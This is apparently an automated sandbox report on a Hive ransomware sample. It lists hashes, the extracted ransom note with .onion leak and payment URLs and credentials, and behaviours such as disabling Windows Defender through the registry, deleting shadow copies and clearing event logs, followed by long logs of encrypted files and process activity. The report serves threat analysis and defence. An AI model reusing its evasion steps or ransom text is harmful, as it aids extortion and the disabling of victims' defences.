hive | 5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584

Analysis

max time kernel
133s
max time network
126s
platform
windows7_x64
resource
win7-en-20211014
submitted
23-11-2021 16:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
Size

2.5MB
MD5

80174956b0d1849ee802490817a2748f
SHA1

8b6648922a6d2bb1ccb419273814387940ad9fcb
SHA256

5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584
SHA512

0b2191126fc2d1f49561439c8e790b67820af86ecad9736c8b44f50a0b4bf7f63a5d7ab7610523ce99c15d208baa43f054afbf0c66f469523b87be1b70f75073

Score

10^/10

hive evasion ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\b8Bo_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note

Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: K61rvptCkHNr Password: vnCCQBqnH1iDfrYcrYwd To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.accuj files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.

URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

Processes:

MpCmdRun.exe

pid process

432 MpCmdRun.exe
Hive
A ransomware written in Golang first seen in June 2021.
ransomware hive
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

pid	process
432	MpCmdRun.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\PushReset.raw => C:\Users\Admin\Pictures\PushReset.raw.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_xY03jh1UsQI0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\PushReset.raw.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_xY03jh1UsQI0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops file in Program Files directory 64 IoCs

Processes:

5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe

description	ioc	process
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_floating.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\sqloledb.rll.mui	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0285822.WMF.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_TSb5Fso1cC40.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0229389.WMF.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_Oq5WlwvSgbI0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\InputPersonalization.exe.mui	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\calendars.properties.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_75ukyZqx4wk0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File created	C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\b8Bo_HOW_TO_DECRYPT.txt	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_DtJFa5BTWus0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Maroon.css.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_Nof84OuJl2w0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\logo.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151061.WMF.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_UIsxJKJSXpU0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\search_background.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\fr-FR\sbdrop.dll.mui	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File created	C:\Program Files\Microsoft Games\More Games\fr-FR\b8Bo_HOW_TO_DECRYPT.txt	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\css\RSSFeeds.css	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR26F.GIF.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_LIALOdcDfh40.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File created	C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\b8Bo_HOW_TO_DECRYPT.txt	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01219_.GIF.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_FTGmZCp4qOU0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\highDpiImageSwap.js	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00442_.WMF.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_zJi-Rc1sr300.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Slipstream.xml.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_lMPsIg-v0rM0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18253_.WMF.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_MBqT8VVTAxA0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21482_.GIF.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_U5MpdSk4Mkg0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File created	C:\Program Files\Microsoft Games\Solitaire\de-DE\b8Bo_HOW_TO_DECRYPT.txt	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Pretty_Peacock.jpg	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_floating.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\ink\en-US\TipRes.dll.mui	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01843_.GIF.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_OIoaa2mx8C00.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_uiNH_NQ1TwM0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_B0o6v93C3Qg0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\mobile.css.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_gUMkp0v62jQ0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGSIDEBRV.XML.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_Qjcz70NSxRc0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ExecutiveResume.dotx.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_M-1IyxiY6ic0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\b8Bo_HOW_TO_DECRYPT.txt	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_zRoGlDlaP7E0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\MSB1CACH.LEX.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_qvI370Wa2GQ0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_r7WauZVXCBY0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00723_.WMF.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_ZLWEr3qGhKA0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0301252.WMF.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_j3uAu_8c5040.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL095.XML.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_h91irAKdDIY0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Gibraltar.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_n0e7wBRSpbQ0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_LuJfyIfPYrM0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\js\calendar.js	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\b8Bo_HOW_TO_DECRYPT.txt	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_Buttongraphic.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_SelectionSubpicture.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_windy.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Green Bubbles.htm	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_aeeWF2eXYbA0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\gadget.xml	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_de_DE.jar.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_1HaWp7KsbZY0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\README.txt.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_AS2rQW8YsFY0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIcon.jpg.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_P_CT9QtsDck0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_OliveGreen.gif.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_jkIsaPYbkzU0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Sydney.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_LJ6YAtnJ2Eg0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_skT0CpU-1V40.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_w1KHjbFqsfk0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_YJq_5ngxwr80.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIconMask.bmp.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_uB5A5R4LN900.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.ja_5.5.0.165303.jar.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_p_ka8691Zqs0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_zh_4.4.0.v20140623020002.jar.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_7rHpQJgNggI0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml.CuoJN7GrG7ty4ZEqe9Z7DkIN7A9fUVVHnFztd8_Ljf3_Oaib9QeIsQQ0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1216 vssadmin.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

2392 notepad.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2428 PING.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe

pid process

964 powershell.exe
2128 powershell.exe
468 5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe

pid	process
1216	vssadmin.exe

pid	process
2392	notepad.exe

pid	process
2428	PING.EXE

pid	process
964	powershell.exe
2128	powershell.exe
468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exe

description	pid	process
Token: SeSecurityPrivilege	1732	wevtutil.exe
Token: SeBackupPrivilege	1732	wevtutil.exe
Token: SeSecurityPrivilege	1944	wevtutil.exe
Token: SeBackupPrivilege	1944	wevtutil.exe
Token: SeSecurityPrivilege	1612	wevtutil.exe
Token: SeBackupPrivilege	1612	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	1948	wmic.exe
Token: SeSecurityPrivilege	1948	wmic.exe
Token: SeTakeOwnershipPrivilege	1948	wmic.exe
Token: SeLoadDriverPrivilege	1948	wmic.exe
Token: SeSystemProfilePrivilege	1948	wmic.exe
Token: SeSystemtimePrivilege	1948	wmic.exe
Token: SeProfSingleProcessPrivilege	1948	wmic.exe
Token: SeIncBasePriorityPrivilege	1948	wmic.exe
Token: SeCreatePagefilePrivilege	1948	wmic.exe
Token: SeBackupPrivilege	1948	wmic.exe
Token: SeRestorePrivilege	1948	wmic.exe
Token: SeShutdownPrivilege	1948	wmic.exe
Token: SeDebugPrivilege	1948	wmic.exe
Token: SeSystemEnvironmentPrivilege	1948	wmic.exe
Token: SeRemoteShutdownPrivilege	1948	wmic.exe
Token: SeUndockPrivilege	1948	wmic.exe
Token: SeManageVolumePrivilege	1948	wmic.exe
Token: 33	1948	wmic.exe
Token: 34	1948	wmic.exe
Token: 35	1948	wmic.exe
Token: SeIncreaseQuotaPrivilege	1120	wmic.exe
Token: SeSecurityPrivilege	1120	wmic.exe
Token: SeTakeOwnershipPrivilege	1120	wmic.exe
Token: SeLoadDriverPrivilege	1120	wmic.exe
Token: SeSystemProfilePrivilege	1120	wmic.exe
Token: SeSystemtimePrivilege	1120	wmic.exe
Token: SeProfSingleProcessPrivilege	1120	wmic.exe
Token: SeIncBasePriorityPrivilege	1120	wmic.exe
Token: SeCreatePagefilePrivilege	1120	wmic.exe
Token: SeBackupPrivilege	1120	wmic.exe
Token: SeRestorePrivilege	1120	wmic.exe
Token: SeShutdownPrivilege	1120	wmic.exe
Token: SeDebugPrivilege	1120	wmic.exe
Token: SeSystemEnvironmentPrivilege	1120	wmic.exe
Token: SeRemoteShutdownPrivilege	1120	wmic.exe
Token: SeUndockPrivilege	1120	wmic.exe
Token: SeManageVolumePrivilege	1120	wmic.exe
Token: 33	1120	wmic.exe
Token: 34	1120	wmic.exe
Token: 35	1120	wmic.exe
Token: SeIncreaseQuotaPrivilege	1120	wmic.exe
Token: SeSecurityPrivilege	1120	wmic.exe
Token: SeTakeOwnershipPrivilege	1120	wmic.exe
Token: SeLoadDriverPrivilege	1120	wmic.exe
Token: SeSystemProfilePrivilege	1120	wmic.exe
Token: SeSystemtimePrivilege	1120	wmic.exe
Token: SeProfSingleProcessPrivilege	1120	wmic.exe
Token: SeIncBasePriorityPrivilege	1120	wmic.exe
Token: SeCreatePagefilePrivilege	1120	wmic.exe
Token: SeBackupPrivilege	1120	wmic.exe
Token: SeRestorePrivilege	1120	wmic.exe
Token: SeShutdownPrivilege	1120	wmic.exe
Token: SeDebugPrivilege	1120	wmic.exe
Token: SeSystemEnvironmentPrivilege	1120	wmic.exe
Token: SeRemoteShutdownPrivilege	1120	wmic.exe
Token: SeUndockPrivilege	1120	wmic.exe
Token: SeManageVolumePrivilege	1120	wmic.exe
Token: 33	1120	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 468 wrote to memory of 1220	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 1220	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 1220	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 1220	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 1220 wrote to memory of 984	1220	net.exe	net1.exe
PID 1220 wrote to memory of 984	1220	net.exe	net1.exe
PID 1220 wrote to memory of 984	1220	net.exe	net1.exe
PID 1220 wrote to memory of 984	1220	net.exe	net1.exe
PID 468 wrote to memory of 612	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 612	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 612	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 612	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 612 wrote to memory of 916	612	net.exe	net1.exe
PID 612 wrote to memory of 916	612	net.exe	net1.exe
PID 612 wrote to memory of 916	612	net.exe	net1.exe
PID 612 wrote to memory of 916	612	net.exe	net1.exe
PID 468 wrote to memory of 2016	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 468 wrote to memory of 2016	468	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
